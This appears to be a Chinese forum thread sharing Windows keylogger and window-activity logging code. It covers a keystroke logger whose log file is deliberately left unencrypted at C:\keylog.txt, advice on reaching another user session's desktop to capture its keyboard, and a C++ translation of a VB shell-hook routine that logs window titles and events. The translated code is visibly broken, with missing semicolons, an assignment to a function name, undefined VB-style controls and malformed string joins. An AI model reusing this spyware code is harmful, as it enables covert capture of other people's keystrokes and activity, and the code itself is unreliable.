DWORD dwSize = GetFileSize(hFile, NULL);
if (dwSize < 1024 * 1024 * 500)
SetFilePointer(hFile, 0, 0, FILE_END);
int nLength = lstrlenA(lpBuffer); WriteFile(hFile, lpBuffer, lstrlenA(lpBuffer), &dwBytesWrite, NULL);
CloseHandle(hFile);
return ;
}
有三行是简单处理那个记录文件的,注释掉使它以明码保存。保存到C:\keylog.txt下。然后保存字节的地方,改成windows方式的换行,我个人的不喜欢那样每个字节都换一下行,所以也注释掉了:
if (IsWindowsFocusChange())
{ lstrcatA(KeyBuffer,"\r\n");
SaveToFile("[内容:]");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
}
else
{ SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
}但诚如Lactoferrin所说,这种方式比较低效。加分的话,那段VB我来翻译。 /:^]
但lactoferrin说的终归是一个问题,要是想记录另外的session里的键盘,得进到和它同一个桌面里才行。 /:^] CreateProcess ();中的LPSTARTUPINFO lpStartupInfo可以设置进程要被创建在桌面。
也可以用
HWINSTA OpenWindowStation(
LPTSTR lpszWinSta, // name of the window station to open
BOOL fInherit, // specifies whether returned handle is inheritable
DWORD dwDesiredAccess // specifies access of returned handle
);
配合
BOOL SetProcessWindowStation(
HWINSTA hWinSta // handle of window station to assign to this process
);
来设置桌面。我把这个翻译了过来,有点原因,这个是作业题 :P。
但没有查错,因为C++里没有那些控件什么的,流程可以用了:#include <windows.h>typedef LONG WINAPI (* RegisterShellHookProcPtr) (HWND hwnd, LONG nAction);RegisterShellHookProcPtr RegisterShellHook= GetProcAddress ( LoadLibraryA ( "Shell32.dll"), reinterpret_cast<LPSTR>(181));const unsigned int HSHELL_WINDOWCREATED = 1;
const unsigned int HSHELL_WINDOWDESTROYED = 2;
const unsigned int HSHELL_ACTIVATESHELLWINDOW = 3;
const unsigned int HSHELL_WINDOWACTIVATED = 4;
const unsigned int HSHELL_GETMINRECT = 5;
const unsigned int HSHELL_REDRAW = 6;
const unsigned int HSHELL_TASKMAN = 7;
const unsigned int HSHELL_LANGUAGE = 8;
const unsigned int HSHELL_SYSMENU = 9;
const unsigned int HSHELL_ENDTASK = 10;
const unsigned int HSHELL_ACCESSIBILITYSTATE = 11;
const unsigned int HSHELL_APPCOMMAND = 12;
const unsigned int HSHELL_WINDOWREPLACED = 13;
const unsigned int HSHELL_WINDOWREPLACING = 14;
const unsigned int HSHELL_HIGHBIT = 0x8000;
const unsigned int HSHELL_FLASH = (HSHELL_REDRAW | HSHELL_HIGHBIT);
const unsigned int HSHELL_RUDEAPPACTIVATED = (HSHELL_WINDOWACTIVATED | HSHELL_HIGHBIT);
const unsigned int GWL_WNDPROC = -4;// ' 该索引用来创建窗口类的子类
LONG Shell_Hook_Msg_ID;
LONG LogWinOldProc;
Control LogControl;
enum mLogControlType
{
tListBox,
tTextBox,
tForm,
tPictureBox,
tLabel
};
mLogControlType LogControlType;extern long WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
void UnRegLogWindow (HWND hwnd);
BOOL RegLogWindow(HWND hwnd, Control mLogControl, mLogControlType tLogControlType)
{
__try
{
LogControlType = tLogControlType;
LONG temp;
Shell_Hook_Msg_ID = RegisterWindowMessage("SHELLHOOK");
RegLogWindow = Shell_Hook_Msg_ID;
RegLogWindow = RegisterShellHook(hwnd, 1);
RegLogWindow= RegisterShellHookWindow(hwnd); // ' 调用未公开的函数(进行注册)
LogWinOldProc = SetWindowLong(hwnd, GWL_WNDPROC, WindowProc); // ' 实施拦截:在存储了原入口地址的同时,将新地址指向自定义的函数WindowProc
LogControl = mLogControl; }
__except (EXCEPTION_EXECUTE_HANDLER)
{
;
}
}void UnRegLogWindow (HWND hwnd)
{
RegisterShellHook(hwnd, 0);
SetWindowLong(hwnd, GWL_WNDPROC, LogWinOldProc);
}long WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)//' 回调函数
{
LONG i;
CString m_Out_String;
CString recTime;
CString recParam;
if (Shell_Hook_Msg_ID==uMsg)
{
SYSTEMTIME temp_SystemTime;
GetSystemTime ( &temp_SystemTime);
recTime.Format( "%4d-%2d-%2d:%2d-%2d-%2d\t0x%x\t0x%x ", temp_SystemTime.wYear, temp_SystemTime.wMonth, temp_SystemTime.wDay,
temp_SystemTime.wHour, temp_SystemTime.wMinute, temp_SystemTime.wSecond
wParam, lParam); switch ( wParam)
{
case HSHELL_WINDOWCREATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWCREATED" + "\t" + " " + m_Out_String;
break;
case HSHELL_WINDOWDESTROYED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWDESTROYED" + "\t" + " " + m_Out_String;
break;
case HSHELL_ACTIVATESHELLWINDOW:
m_Out_String = recTime + "HSHELL_ACTIVATESHELLWINDOW";
break;
case HSHELL_WINDOWACTIVATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWACTIVATEED" + "\t" + " " + m_Out_String;
break;
case HSHELL_GETMINRECT:
m_Out_String = recTime+ "HSHELL_GETMINRECT"
break; case HSHELL_REDRAW:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_REDRAW" + "\t" + " " + m_Out_String;
break;
case HSHELL_TASKMAN:
m_Out_String = recTime+ "HSHELL_TASKMAN";
break;
case HSHELL_LANGUAGE:
m_Out_String = recTime+ "HSHELL_LANGUAGE";
break;
case HSHELL_SYSMENU:
m_Out_String = recTime "HSHELL_SYSMENU";
break;
case HSHELL_ENDTASK:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_ENDTASK" + "\t" + " " + m_Out_String;
break;
case HSHELL_ACCESSIBILITYSTATE:
m_Out_String = recTime+ "HSHELL_ACCESSIBILITYSTATE"
break;
case HSHELL_APPCOMMAND:
m_Out_String = recTime+ "HSHELL_APPCOMMAND"
break;
case HSHELL_WINDOWREPLACED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWREPLACED" + "\t" + " " + m_Out_String;
break; case HSHELL_WINDOWREPLACING:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWREPLACING" + "\t" + " " + m_Out_String;
break;
case HSHELL_FLASH:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_FLASH" + "\t" + " " + m_Out_String;
break;
case HSHELL_RUDEAPPACTIVATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_RUDEAPPACTIVATEED" + "\t" + " " + m_Out_String;
break; } if (0!=m_Out_String.size ())
{
m_WriteToControl(m_Out_String);
} }
else
{
return CallWindowProc ( LogWinOldProc, hwnd, uMsg, wParam, lParam)
}
}
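// Writes one formatted log line to the control held in LogControl, choosing the
// member that fits the control kind stored in LogControlType. This is the C++
// rendering of the VB routine of the same name from the same thread.
//
// t_str: the already formatted log line.
//
// NOTE(review): `Control` and its members (AddItem, Text, Print, Caption) are not
// defined anywhere in the visible code; they stand in for the VB controls and have
// to be supplied by whatever UI wrapper the translation is used with.
void m_WriteToControl(CString t_str)
{
    switch (LogControlType)
    {
    case tListBox:
        LogControl.AddItem(t_str);
        break;
    case tTextBox:
        // The VB original joins lines with vbCrLf; the first translation used "\t",
        // which put every entry on one line.
        LogControl.Text = LogControl.Text + "\r\n" + t_str;
        break;
    case tForm:
    case tPictureBox:
        // Was `LogControl.Print t_str;`, VB call syntax that is not valid C++.
        LogControl.Print(t_str);
        break;
    case tLabel:
        // A label keeps only the most recent line.
        LogControl.Caption = t_str;
        break;
    default:
        // Unknown control kind: write nothing, as the VB Select Case does.
        break;
    }
}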